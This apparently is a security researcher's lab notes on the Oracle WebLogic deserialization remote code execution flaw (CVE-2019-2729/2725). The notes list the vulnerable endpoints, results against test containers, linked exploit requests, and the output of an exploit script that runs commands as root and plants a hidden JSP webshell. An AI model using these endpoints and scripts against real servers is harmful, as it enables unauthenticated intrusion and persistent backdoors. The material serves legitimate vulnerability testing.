# WebLogic - CVE-2019-2729

Oracle WebLogic server is affected by a **remote code execution** vulnerability in `wls-wsat.war` and `wls9_async_response.war` packages due to unsafe deserialization of Java objects. A remote **unauthenticated** attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting `wls-wsat.war` will return command output, while `wls9_async_response.war` is blind.

Affected versions: **10.3.6.0.0**, **12.1.3.0.0** and **12.2.1.3.0**

### **Vulnerable endpoints**

<pre class="language-bash"><code class="lang-bash">## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
<strong>/_async/AsyncResponseService
</strong></code></pre>

### Test data

<table><thead><tr><th width="130">Version</th><th width="199">Image</th><th width="145">Result</th><th>Reason</th></tr></thead><tbody><tr><td>10.3.6.0</td><td><a href="https://hub.docker.com/layers/vulhub/weblogic/10.3.6.0-2017/images/sha256-275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9?context=explore">VulnHub 10.3.6.0-2017</a></td><td>Vulnerable</td><td>wls-wsat deserialization</td></tr><tr><td>12.2.1.3</td><td><a href="https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3-2018/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore">VulnHub 12.2.1.3-2018</a></td><td>Not vulnerable</td><td>Endpoints missing</td></tr><tr><td>12.2.1.3</td><td><a href="https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore">VulnHub 12.2.1.3</a></td><td>Not vulnerable</td><td>Endpoints missing</td></tr><tr><td>12.2.1.3</td><td><a href="https://container-registry.oracle.com/ords/f?p=113:4:100763132084359:::4:P4_REPOSITORY,AI_REPOSITORY,AI_REPOSITORY_NAME,P4_REPOSITORY_NAME,P4_EULA_ID,P4_BUSINESS_AREA_ID:5,5,Oracle%20WebLogic%20Server,Oracle%20WebLogic%20Server,1,0&#x26;cs=3KTZ9kW4gHaVNXvYp_seg3AmnCL3G7pI4VfyLUNKH2oNI2LPL15b5PgGNbUGWjuU0cZz_Tul__-raSj8DmP2tQQ">weblogic:12.2.1.3</a></td><td>Inconclusive</td><td>"<em>Old format work area header is disabled."</em></td></tr></tbody></table>

[Request 01](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req01.txt), RCE on version 10.3.6.0:

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FhxJW3FENgBbiNICm8a8E%2Fcve-2019-2725.png?alt=media&#x26;token=f68758ac-2894-4e96-9f63-e7a2e0c6ba8e" alt=""><figcaption></figcaption></figure>

[Request 02](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req02.txt), designed for version 10.2.7.1, RCE on 10.3.6.0:

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2F9nj2QgSCwz5VpSMy5s9i%2Fimage.png?alt=media&#x26;token=bd505abb-9ba9-4aaf-804c-0c6455d978ba" alt=""><figcaption></figcaption></figure>

[Request 03](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req03.txt), designed for version 10.3.6.0, RCE on 10.3.6.0:

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2F5L5wavLApgF1rDnmT1z0%2Fimage.png?alt=media&#x26;token=1f77fdb9-a8ef-42a2-b816-d5605e26b028" alt=""><figcaption></figcaption></figure>

[Request 04](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req04.txt), designed for version 10.3.6.2, RCE on 10.3.6.0:

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FXOwsswYjyPQ2Ob16FQrY%2Fimage.png?alt=media&#x26;token=ef4263cd-e836-4204-9eb8-b38fe01e1773" alt=""><figcaption></figcaption></figure>

[Request 05](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req05.txt), designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container, need more test data.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FmiJGthQwMb29mhPiCCap%2Fimage.png?alt=media&#x26;token=27501680-bbee-429b-b5a3-02524666eaa2" alt=""><figcaption></figcaption></figure>

### Scripts

[`weblogic_get_webshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/weblogic_get_webshell/weblogic_get_webshell.py) - runs three payloads on target at once, by [rootedshell](https://github.com/rootedshell/Weblogic/tree/master).

```bash
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root
```

As there are few public exploits using the `/_async/` endpoint, I've modified *rootedshells* script to only upload a webshell and allow direct command execution. The script can be found [here](https://github.com/0xPThree/WebLogic/tree/main/cve-2019-2725/weblogic_webshell).

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FzVzGzOpPNsJ7lXjPPqe3%2Fimage.png?alt=media&#x26;token=fa96aaad-64fc-4c7d-8437-ab8c44bb28d2" alt=""><figcaption></figcaption></figure>